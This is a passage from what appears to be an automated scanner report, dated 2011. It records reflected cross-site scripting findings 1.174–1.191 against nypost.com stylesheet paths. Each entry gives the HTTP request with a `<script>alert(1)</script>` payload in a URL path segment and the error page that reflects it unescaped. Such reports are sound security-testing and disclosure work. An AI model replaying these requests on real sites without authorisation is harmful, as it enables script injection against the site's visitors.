GET /Resource/SysConfig/WebPortalcff06<script>alert(1)</script>dce59e57048/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalcff06<script>alert(1)</script>dce59e57048/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.174. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f949a<script>alert(1)</script>e6ac455d380 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostf949a<script>alert(1)</script>e6ac455d380/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostf949a<script>alert(1)</script>e6ac455d380/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.175. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8670b<script>alert(1)</script>db8e6dc803f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks8670b<script>alert(1)</script>db8e6dc803f/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks8670b<script>alert(1)</script>db8e6dc803f/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.176. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 704f1<script>alert(1)</script>af0fc94043d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos704f1<script>alert(1)</script>af0fc94043d/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos704f1<script>alert(1)</script>af0fc94043d/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.177. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 12925<script>alert(1)</script>0cb86b9952 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners12925<script>alert(1)</script>0cb86b9952/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 750
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners12925<script>alert(1)</script>0cb86b9952/promos_and_partners.css</p>
...[SNIP]...

1.178. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload c262d<script>alert(1)</script>8a886726475 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.cssc262d<script>alert(1)</script>8a886726475 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.cssc262d<script>alert(1)</script>8a886726475</p>
...[SNIP]...

1.179. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bffa7<script>alert(1)</script>5fc3b51a0a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigbffa7<script>alert(1)</script>5fc3b51a0a1/WebPortal/nypost/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigbffa7<script>alert(1)</script>5fc3b51a0a1/WebPortal/nypost/blocks/ads/ads.css</p>
...[SNIP]...

1.180. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e4cf7<script>alert(1)</script>aab02ede959 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortale4cf7<script>alert(1)</script>aab02ede959/nypost/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortale4cf7<script>alert(1)</script>aab02ede959/nypost/blocks/ads/ads.css</p>
...[SNIP]...

1.181. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cfdca<script>alert(1)</script>d30004878bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostcfdca<script>alert(1)</script>d30004878bb/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostcfdca<script>alert(1)</script>d30004878bb/blocks/ads/ads.css</p>
...[SNIP]...

1.182. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1fd42<script>alert(1)</script>67ffcdae71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1fd42<script>alert(1)</script>67ffcdae71/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1fd42<script>alert(1)</script>67ffcdae71/ads/ads.css</p>
...[SNIP]...

1.183. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d8b49<script>alert(1)</script>24ae8c1056d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/adsd8b49<script>alert(1)</script>24ae8c1056d/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/adsd8b49<script>alert(1)</script>24ae8c1056d/ads.css</p>
...[SNIP]...

1.184. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1bdbd<script>alert(1)</script>b06ae33e8bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css1bdbd<script>alert(1)</script>b06ae33e8bd HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css1bdbd<script>alert(1)</script>b06ae33e8bd</p>
...[SNIP]...

1.185. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59948<script>alert(1)</script>50cd9c0218a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.186. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff08<script>alert(1)</script>577eb990e51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.187. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9da4<script>alert(1)</script>551afe08244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css</p>
...[SNIP]...

1.188. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d11b<script>alert(1)</script>5def719c2ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css</p>
...[SNIP]...

1.189. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8933b<script>alert(1)</script>9d642fdaca7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css</p>
...[SNIP]...

1.190. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b1b03<script>alert(1)</script>aa44ba2121a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a</p>
...[SNIP]...

1.191. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

